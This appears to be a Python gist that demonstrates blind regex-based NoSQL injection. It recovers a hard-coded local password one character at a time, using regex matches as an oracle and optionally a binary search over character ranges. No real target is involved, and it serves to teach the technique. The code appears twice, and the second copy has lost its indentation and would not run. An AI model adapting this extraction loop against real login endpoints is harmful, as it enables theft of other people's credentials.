UlisseMini/blind-regex-based-nosqli.py

## blind-regex-based-nosqli.py
"""
Inspired from https://youtu.be/NO_lsfhQK_s (aka blind regex based nosql injection)
"""

import re, time, string

should_sleep = True
binary_search_blind = True
attempts = 0

password = 'suPerSe&c3U2r^Rp(Aswo!rD'

def inject(payload):
    global attempts
    print(payload, end=(' ' * 30) + '\r')
    attempts += 1
    if should_sleep:
        time.sleep(0.05)

    return re.match(payload, password) is not None


found = ''
keepGoing = True
while keepGoing:
    # Default charset
    charset = string.printable.strip() + ' '

    if binary_search_blind:
        # Regex gets angry if we try something like Z-A because ord(Z) > ord(A)
        # so we fix that here.
        charset = ''.join(sorted(charset, key=ord))

        while len(charset) != 1:
            a = charset[:len(charset)//2]
            b = charset[len(charset)//2:]

            # Find which is the character is inside, a or b
            # this assumes that the character MUST BE INSIDE THE CHARSET!
            if inject('{}[{}-{}]'.format(re.escape(found), re.escape(a[0]), re.escape(a[-1]))):
                charset = a

            # technically we could just use else.
            # however, this would mean the program would be unable to check if it is done. and would loop
            # forever adding charset[-1] to found.
            # so, this is our work around
            else:
                if b == '~' and not inject(re.escape(found + b)):
                    keepGoing = False
                    break
                else:
                    charset = b

            if len(charset) == 1 and keepGoing:
                found += charset
    else:
        for c in charset:
            if inject(re.escape(found + c)):
                keepGoing = True
                found += c

print()
print('Took %d attempts.' % attempts)
print('Correct?: {}'.format(password == found))
	"""
	Inspired from https://youtu.be/NO_lsfhQK_s (aka blind regex based nosql injection)
	"""

	import re, time, string

	should_sleep = True
	binary_search_blind = True
	attempts = 0

	password = 'suPerSe&c3U2r^Rp(Aswo!rD'

	def inject(payload):
	global attempts
	print(payload, end=(' ' * 30) + '\r')
	attempts += 1
	if should_sleep:
	time.sleep(0.05)

	return re.match(payload, password) is not None


	found = ''
	keepGoing = True
	while keepGoing:
	# Default charset
	charset = string.printable.strip() + ' '

	if binary_search_blind:
	# Regex gets angry if we try something like Z-A because ord(Z) > ord(A)
	# so we fix that here.
	charset = ''.join(sorted(charset, key=ord))

	while len(charset) != 1:
	a = charset[:len(charset)//2]
	b = charset[len(charset)//2:]

	# Find which is the character is inside, a or b
	# this assumes that the character MUST BE INSIDE THE CHARSET!
	if inject('{}[{}-{}]'.format(re.escape(found), re.escape(a[0]), re.escape(a[-1]))):
	charset = a

	# technically we could just use else.
	# however, this would mean the program would be unable to check if it is done. and would loop
	# forever adding charset[-1] to found.
	# so, this is our work around
	else:
	if b == '~' and not inject(re.escape(found + b)):
	keepGoing = False
	break
	else:
	charset = b

	if len(charset) == 1 and keepGoing:
	found += charset
	else:
	for c in charset:
	if inject(re.escape(found + c)):
	keepGoing = True
	found += c

	print()
	print('Took %d attempts.' % attempts)
	print('Correct?: {}'.format(password == found))